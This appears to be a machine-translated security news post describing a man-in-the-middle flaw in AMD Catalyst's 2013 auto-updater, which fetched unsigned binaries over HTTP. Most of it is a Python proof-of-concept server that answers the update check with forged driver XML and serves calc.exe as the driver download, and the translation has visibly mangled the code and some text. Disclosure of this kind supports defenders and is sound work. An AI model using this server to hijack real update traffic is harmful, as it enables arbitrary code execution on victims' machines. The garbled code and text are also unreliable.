In2013Year1Month17,AMDReleasedAMDCatalyst13.1And then announced the deletion of the auto-update feature.AMDThe reason is that there is a security problem in the automatic update. Recently, details about the security problem are reported on the network because the man-in-the-middle attack can be used to hijack the automatic update request.
The vulnerability is stored as follows:
Binary program download is completed through HTTP.
AMD has signed the verification before execution.
This means that the man-in-the-middle attack can be used to intercept requests from AMD's technical support websites and redirect requests to specially crafted application pages or programs.
POC
Import SimpleHTTPServer
Import SocketServer
Xml = "" <? Xml version = "1.0" encoding = "UTF-8"?>
<List>
<Catalyst-Driver-Files>
<Title> Catalyst Software Suite with. NET 4 Support </Title>
<DriverCategory> Full Catalyst Software Suite (Recommended) </DriverCategory>
<DriverLanguage >;#all ;#</DriverLanguage>
<DriverProductType >;#1-radeon; #3-Integrated; # 18-AIW_HD; # </DriverProductType>
<FileSize> 184 MB </FileSize>
<OSType>; # Windows Vista-64-Bit Edition; # Windows 7-64-Bit Edition; # </OSType>
<ReleaseDate> 2012-10-22T00: 00: 00-05:00 </ReleaseDate>
<RevisionNumber> 12.42 </RevisionNumber>
<RollupSortOrder> 15 </RollupSortOrder>
<TextMultiple1>
</TextMultiple1>
Http://www2.ati.com/drivers/12-10_vista_win7_win8_64_dd_ccc_whql_net4.exe </TextSingle1>
<TechDownloadGPUSubtype> Driver </TechDownloadGPUSubtype>
<ContentType> GraphicsDriverFile </ContentType>
<DriverVersionSupported >;# 12.42 ;#</DriverVersionSupported>
<ID> 956 </ID>
<Modified> 2012-10-22T21: 30: 52-05:00 </Modified>
<Created> 2012-10-22T21: 30: 52-05:00 </Created>
<Author> System Account </Author>
<Editor> System Account </Editor>
<_ UIVersionString> 1.0 </_ UIVersionString>
<Attachments> 0 </Attachments>
<TitleCN> Catalyst Software Suite </TitleCN>
<TitleBR> Catalyst Software Suite </TitleBR>
<TitleDE> Catalyst Software Suite </TitleDE>
<TitleFR> Catalyst Software Suite </TitleFR>
<TitleIT> Catalyst Software Suite </TitleIT>
<TitleLA> Catalyst Software Suite </TitleLA>
<DescriptionCN>
</DescriptionCN>
<DescriptionBR>
</DescriptionBR>
<DescriptionDE>
</DescriptionDE>
<DescriptionFR>
</DescriptionFR>
<DescriptionIT>
</DescriptionIT>
<DescriptionLA>
</DescriptionLA>
<TitleKR> (Catalyst Software Suite) </TitleKR>
<DescriptionKR>
</DescriptionKR>
<LinkTitleNoMenu> Catalyst Software Suite with. NET 4 Support </LinkTitleNoMenu>
<LinkTitle> Catalyst Software Suite with. NET 4 Support </LinkTitle>
</Catalyst-Driver-Files>
</List>
"""
Class ExploitHandler (SimpleHTTPServer. SimpleHTTPRequestHandler ):
Def do_GET (self ):
If "deststxml" in self. path:
Self. send_response (200)
Self. send_header ('content-type', 'text/xml ')
Self. end_headers ()
Self. wfile. write (xml)
Return
Elif ". exe" in self. path:
Self. send_response (200)
Self. send_header ('content-type', 'application/octet-stream ')
Self. end_headers ()
F = open (r "C: \ Windows \ System32 \ calc.exe", "rb ")
Self. wfile. write (f. read ())
F. close ()
Return
Httpd = SocketServer. ThreadingTCPServer ('0. 0.0.0 ', 80), ExploitHandler)
Httpd. serve_forever ()
Hosts file.
Many applications may have this vulnerability. Foreigners have developed an EvilGrade tool to find these security problems.